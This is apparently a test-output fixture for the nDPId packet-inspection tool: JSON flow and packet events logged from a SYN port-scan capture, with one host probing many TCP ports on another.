-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058906,"pkt":"ACYLMQczACWzv5HuCABFAAAsLE8AACYG9iOsEAAIQA2GNIzTBfTdU4MZAAAAAGACDAAmmAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs4LEAADcGMMGsEAAIQA2GNIzTBoLdU4MZAAAAAGACEAAiCgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsgKkAACgGn8msEAAIQA2GNIzTBD\/dU4MZAAAAAGACBAAwTQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsqWEAADIGbRGsEAAIQA2GNIzTHnjdU4MZAAAAAGACDAAOFAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsfMoAACYGpaisEAAIQA2GNIzTTUTdU4MZAAAAAGACDADfRwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs+oEAACwGIfGsEAAIQA2GNIzTEA\/dU4MZAAAAAGACBAAkfQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsn\/4AACkGf3SsEAAIQA2GNIzTatzdU4MZAAAAAGACCADFrwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs32IAADoGLxCsEAAIQA2GNIzTFUDdU4MZAAAAAGACDAAXTAAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAswOYAAC0GWoysEAAIQA2GNIzTAGPdU4MZAAAAAGACCAAwKQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAspGsAACYGfgesEAAIQA2GNIzTBBDdU4MZAAAAAGACDAAofAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAs6bIAACsGM8CsEAAIQA2GNIzTFqjdU4MZAAAAAGACEAAR5AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsNOsAACwG54esEAAIQA2GNIzTD6XdU4MZAAAAAGACBAAk5wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058970,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058970,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5wAACgGYNasEAAIQA2GNIzTBI7dU4MZAAAAAGACBAAv\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAspqkAADMGbsmsEAAIQA2GNIzTBTDdU4MZAAAAAGACEAAjXAAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsvjkAACUGZTmsEAAIQA2GNIzTAAndU4MZAAAAAGACCAAwgwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAs1ygAAC8GQkqsEAAIQA2GNIzTrdXdU4MZAAAAAGACEAB6tgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsiLIAACsGlMCsEAAIQA2GNIzSC5jdUoMYAAAAAGACEAAc9wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsnfMAADkGcX+sEAAIQA2GNIzSC13dUoMYAAAAAGACCAAlMgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsz0EAACkGUDGsEAAIQA2GNIzSCVndUoMYAAAAAGACCAAnNgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsLKEAADEG6tGsEAAIQA2GNIzSBC7dUoMYAAAAAGACCAAsYQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsduwAACUGrIasEAAIQA2GNIzSAP7dUoMYAAAAAGACCAAvkQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsXOUAADIGuY2sEAAIQA2GNIzSDsjdUoMYAAAAAGACDAAdxwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsE7oAADAGBLmsEAAIQA2GNIzSJxndUoMYAAAAAGACBAANdgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058971,"pkt":"ACYLMQczACWzv5HuCABFAAAsWC0AADQGvEWsEAAIQA2GNIzSBEndUoMYAAAAAGACBAAwRgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058971,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 